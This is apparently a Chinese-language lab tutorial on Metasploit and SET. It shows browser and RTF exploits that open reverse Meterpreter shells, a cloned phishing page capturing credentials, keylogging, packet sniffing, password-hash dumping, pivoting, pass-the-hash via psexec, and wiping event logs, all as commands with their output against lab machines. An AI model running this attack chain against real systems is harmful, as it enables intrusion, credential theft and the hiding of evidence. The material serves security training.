    Network Card(s):           1 NIC(s) Installed.
                               [01]: Intel(R) PRO/1000 MT Network Connection
                                     Connection Name: Local Area Connection
                                     DHCP Enabled:    No
                                     IP address(es)
                                     [01]: 10.10.10.130
    

    客户端渗透

    MS11050

    search ms11_050
    
    use exploit/windows/browser/ms11_050_mshtml_cobjectelement
    set payload windows/meterpreter/reverse_http
    set SRVHOST 0.0.0.0
    set SRVPORT 8080
    set LHOST 10.10.10.128
    set LPORT 4444
    set target 1
    set URIPATH ms11050
    exploit
    
    msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > exploit
    [*] Started reverse TCP handler on 10.10.10.128:4444
    [*] Using URL: http://10.10.10.128:8080/ms11050
    [*] Server started.
    

    提示信息,攻击目标需要访问以下URL

    http://10.10.10.128:8080/ms11050
    

    因攻击目标内置IE6,非漏洞版本IE7,需要下载IE7后访问URL
    https://www.download3k.com/Install-Internet-Explorer.html
    https://www.microsoft.com/ja-jp/download/details.aspx?id=41071

    在这里插入图片描述在这里插入图片描述在IE7中访问URL

    http://10.10.10.128:8080/ms11050
    

    Metasploit中接收到信息

    [*] 192.168.10.128   ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
    

    没有获得权限,IE7安装程序可能存在问题

    更换攻击目标为Windows 7 IE8后,浏览器崩溃,仍无法获得权限

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    MS10087

    search ms10_087
    
    use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    set payload windows/exec
    set CMD calc.exe
    set FILENAME ms10087.rtf
    exploit
    
    msf6 > search ms10_087
    
    Matching Modules
    ================
    
       #  Name                                                    Disclosure Date  Rank   Check  Description
       -  ----                                                    ---------------  ----   -----  -----------
       0  exploit/windows/fileformat/ms10_087_rtf_pfragments_bof  2010-11-09       great  No     MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
    
    
    Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    
    msf6 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/exec
    payload => windows/exec
    msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set CMD calc.exe
    CMD => calc.exe
    msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
    FILENAME => ms10087.rtf
    msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit
    
    [*] Creating 'ms10087.rtf' file ...
    [+] ms10087.rtf stored at C:/Users/IDEA/.msf4/local/ms10087.rtf
    

    提示信息显示文件路径

    C:/Users/IDEA/.msf4/local/ms10087.rtf
    

    在系统中找到这个文件,将这个文件复制到WinXP Metasploitable靶机中双击打开,攻击目标被诱导打开文件

    WinXP Metasploitable在双击后会打开payload中设置的计算器程序
    在这里插入图片描述

    社会工程学

    钓鱼网站

    http://10.10.10.129/signin.html
    

    在这里插入图片描述在Kali Linux中安装Set工具以用于仿造Web界面

    apt-get -y install set
    

    运行set

    setoolkit
    
    root@DESKTOP-9I2FBB4:~# setoolkit
                  ________________________
                  __  ___/__  ____/__  __/
                  _____ \__  __/  __  /
                  ____/ /_  /___  _  /
                  /____/ /_____/  /_/
    
    [---]        The Social-Engineer Toolkit (SET)         [---]
    [---]        Created by: David Kennedy (ReL1K)         [---]
                          Version: 8.0.3
                        Codename: 'Maverick'
    [---]        Follow us on Twitter: @TrustedSec         [---]
    [---]        Follow me on Twitter: @HackingDave        [---]
    [---]       Homepage: https://www.trustedsec.com       [---]
            Welcome to the Social-Engineer Toolkit (SET).
             The one stop shop for all of your SE needs.
    
       The Social-Engineer Toolkit is a product of TrustedSec.
    
               Visit: https://www.trustedsec.com
    
       It's easy to update using the PenTesters Framework! (PTF)
    Visit https://github.com/trustedsec/ptf to update all your tools!
    set>
    
     Select from the menu:
    
       1) Social-Engineering Attacks
       2) Penetration Testing (Fast-Track)
       3) Third Party Modules
       4) Update the Social-Engineer Toolkit
       5) Update SET configuration
       6) Help, Credits, and About
    
      99) Exit the Social-Engineer Toolkit
    

    选择1) Social-Engineering Attacks

    1
    

    提示信息

     Select from the menu:
    
       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
       3) Infectious Media Generator
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) Wireless Access Point Attack Vector
       8) QRCode Generator Attack Vector
       9) Powershell Attack Vectors
      10) Third Party Modules
    
      99) Return back to the main menu.
    

    选择2) Website Attack Vectors

    2
    

    提示信息

       1) Java Applet Attack Method
       2) Metasploit Browser Exploit Method
       3) Credential Harvester Attack Method
       4) Tabnabbing Attack Method
       5) Web Jacking Attack Method
       6) Multi-Attack Web Method
       7) HTA Attack Method
    
      99) Return to Main Menu
    

    选择3) Credential Harvester Attack Method

    3
    

    提示信息

       1) Web Templates
       2) Site Cloner
       3) Custom Import
    
      99) Return to Webattack Menu
    

    选择2) Site Cloner

    2
    

    提示信息

    set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.10.10.128]:
    

    提示信息

    set:webattack> Enter the url to clone:
    

    输入要克隆的URL

    http://10.10.10.129/signin.html
    
    set:webattack> Enter the url to clone:http://10.10.10.129/signin.html
    
    [*] Cloning the website: http://10.10.10.129/signin.html
    [*] This could take a little bit...
    
    The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
    [*] The Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:
    

    访问仿冒的URL

    http://10.10.10.128/
    

    在这里插入图片描述

    提示信息

    10.10.10.128 - - [17/Apr/2022 11:42:06] "GET / HTTP/1.1" 200 -
    

    在仿冒的网页中输入用户名和口令
    在这里插入图片描述输入完成后会跳转到真实的地址在这里插入图片描述
    提示信息,获取到了在仿冒网页中输入的用户名和口令信息

    [*] WE GOT A HIT! Printing the output:
    POSSIBLE USERNAME FIELD FOUND: username=admin
    POSSIBLE PASSWORD FIELD FOUND: password=admin
    POSSIBLE USERNAME FIELD FOUND: Login=Login
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
    

    后渗透攻击

    Metasploit后渗透攻击模块主要支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。Metasploit位于后渗透攻击阶段主要利用post(后渗透模块)。
    post(后渗透模块):拿到权后,进一步对目标和内网进行渗透。

    信息窃取

    dumplinks模块获取近期操作和访问记录

    run post/windows/gather/dumplinks
    
    meterpreter > run post/windows/gather/dumplinks
    
    [*] Running module against DH-CA8822AB9589
    [*] Running as SYSTEM extracting user list...
    [*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
    [*] Processing: C:\Documents and Settings\Administrator\Recent\0927.pdf.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\1.html.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\Copy of kingview.html.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\IIS6.CAB.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\IIS_XPSP3.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\IMS.CAB.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\kingview.html.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\KingView.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\KVWebSvr.dll.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\msf.pdf.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document (2).txt.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document.txt (10).lnk.
    

    enum_application模块获取安装软件、安全更新与漏洞补丁

    run post/windows/gather/enum_applications
    
    meterpreter > run post/windows/gather/enum_applications
    
    [*] Enumerating applications installed on DH-CA8822AB9589
    
    Installed Applications
    ======================
    
     Name                                    Version
     ----                                    -------
     Adobe Reader 9                          9.0.0
     KingView 6.53                           6.53
     KingView Driver                         6.53
     Microsoft Office Standard Edition 2003  11.0.8173.0
     Sentinel Protection Installer 7.5.0     7.5.0
     VMware Tools                            8.1.4.11056
     WebFldrs XP                             9.50.7523
    
    
    [+] Results stored in: C:/Users/IDEA/.msf4/loot/20220417155003_default_192.168.10.128_host.application_916948.txt
    

    keyscan获取键盘记录

    keyscan_start
    keyscan_dump
    keyscan_stop
    

    sniffer嗅探口令

    use sniffer
    
    sniffer_interfaces
    
    sniffer_start 1
    
    sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
    
    sniffer_stop 1
    
    meterpreter > use sniffer
    Loading extension sniffer...Success.
    meterpreter > sniffer_interfaces
    1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
    meterpreter > sniffer_start 1
    [*] Capture started on interface 1 (50000 packet buffer)
    meterpreter > sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
    [*] Flushing packet capture buffer for interface 1...
    [*] Flushed 8 packets (1174 bytes)
    [*] Downloaded 100% (1174/1174)...
    [*] Download completed, converting to PCAP...
    [*] PCAP file written to C:UsersIDEADownloadscap1.pcap
    meterpreter > sniffer_stop 1
    [*] Capture stopped on interface 1
    [*] There are 0 packets (0 bytes) remaining
    [*] Download or release them using 'sniffer_dump' or 'sniffer_release'
    

    enum_ie模块获取缓存IE浏览器中的口令

    run post/windows/gather/enum_ie
    
    meterpreter > run post/windows/gather/enum_ie
    
    [*] IE Version: 6.0.2900.5512
    [-] This module will only extract credentials for >= IE7
    [*] Retrieving history.....
    [*] Retrieving cookies.....
    [*] Looping through history to find autocomplete data....
    [-] No autocomplete entries found in registry
    [*] Looking in the Credential Store for HTTP Authentication Creds...
    

    hashdump获取系统密文口令

    hashdump
    
    meterpreter > hashdump
    Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
    IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
    IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
    

    内网拓展

    获取路由

    run get_local_subnets
    
    meterpreter > run get_local_subnets
    
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    Local subnet: 10.10.10.0/255.255.255.0
    Local subnet: 192.168.10.0/255.255.255.0
    

    后台session

    background
    
    meterpreter > background
    [*] Backgrounding session 1...
    msf6 exploit(windows/smb/ms08_067_netapi) > sessions
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information                            Connection
      --  ----  ----                     -----------                            ----------
      1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DH-CA8822AB9589  192.168.10.1:24066 -> 192.168.10.128:5000  (192.168.10.128)
    
    msf6 exploit(windows/smb/ms08_067_netapi) > sessions 1
    [*] Starting interaction with 1...
    
    meterpreter >
    

    查看路由

    route print
    

    添加路由

    route add 192.168.10.0 255.255.255.0 1
    
    msf6 exploit(windows/smb/ms08_067_netapi) > route print
    [*] There are currently no routes defined.
    msf6 exploit(windows/smb/ms08_067_netapi) > route add 192.168.10.0 255.255.255.0 1
    [*] Route added
    msf6 exploit(windows/smb/ms08_067_netapi) > route print
    
    IPv4 Active Routing Table
    =========================
    
       Subnet             Netmask            Gateway
       ------             -------            -------
       192.168.10.0       255.255.255.0      Session 1
    
    [*] There are currently no IPv6 routes defined.
    

    口令利用

    use exploit/windows/smb/psexec
    set payload windows/meterpreter/bind_tcp
    set LHOST 10.10.10.128
    set LPORT 443
    set RHOST 192.168.10.128
    set SMBUser Administrator
    set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
    exploit
    
    msf6 > use exploit/windows/smb/psexec
    [*] Using configured payload windows/upexec/reverse_tcp
    msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
    payload => windows/meterpreter/bind_tcp
    msf6 exploit(windows/smb/psexec) > set LHOST 10.10.10.128
    LHOST => 10.10.10.128
    msf6 exploit(windows/smb/psexec) > set LPORT 443
    LPORT => 443
    msf6 exploit(windows/smb/psexec) > set RHOST 192.168.10.128
    RHOST => 192.168.10.128
    msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
    SMBUser => Administrator
    msf6 exploit(windows/smb/psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
    SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
    msf6 exploit(windows/smb/psexec) > exploit
    
    [*] 192.168.10.128:445 - Connecting to the server...
    [*] 192.168.10.128:445 - Authenticating to 192.168.10.128:445 as user 'Administrator'...
    [-] 192.168.10.128:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
    [*] Exploit completed, but no session was created.
    

    掩踪灭迹

    清除日志痕迹

    clearev
    
    meterpreter > clearev
    [*] Wiping 327 records from Application...
    [*] Wiping 518 records from System...
    [*] Wiping 0 records from Security...
    

    掩饰修改的文件时间戳

    timestomp
    

    iCTF

    环境概览

    环境名称用途备注
    iCTF 2011 ServerLinux靶机下载vmware虚拟机镜像

    环境下载

    链接: https://pan.baidu.com/s/1KYRLKW1iRS-YfSoM-xlMdg?pwd=ju8g
    提取码: ju8g

    展开全文
  • Metasploit渗透测试指南.pdf

    热门讨论 2012-12-10 10:28:47
    Metasploit渗透测试指南》获得了Metasploit开发团队的一致好评,Metasploit项目创始人HD Moore评价《Metasploit渗透测试指南》为:“现今最好的Metasploit框架软件参考指南”。 《Metasploit渗透测试指南》适合...
  • 利用metasploit渗透测试制作隐藏后门 @目录 1. 使用ms17-010永恒之蓝漏洞对win7进行渗透 2. 制作linux无文件木马程序 3. 使用脚本来进行自动创建后门 使用ms17-010永恒之蓝漏洞对win7进行渗透 已知win7ip:192.168...
  • 在我们获取了目标Android手机的Meterpreter权限之后,我们可以执行如下命令进行后渗透攻击 注意:如下命令都是在meterpreter命令行下执行的。 5-1.查看手机是否root过 check_root 5-2.发送短信 ...
  • 1.Metasploit 渗透测试框架介绍 2.Metasploitable2-Linux 靶机系统介绍 3.Metasploit 基本使用方法 4.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令 5.实战-使用 msf 扫描靶机上 mysql 服务的空密码
  • Metasploit 渗透测试

    千次阅读 2022-01-18 17:43:35
    =[ metasploit v6.1.14-dev ] + -- --=[ 2180 exploits - 1155 auxiliary - 399 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 9 evasion ] Metasploit tip: Start commands with a space to...
  • Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?接下来让我们一起学习! 二、资源装备 1...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 9,354
精华内容 3,741
关键字:

metasploit渗透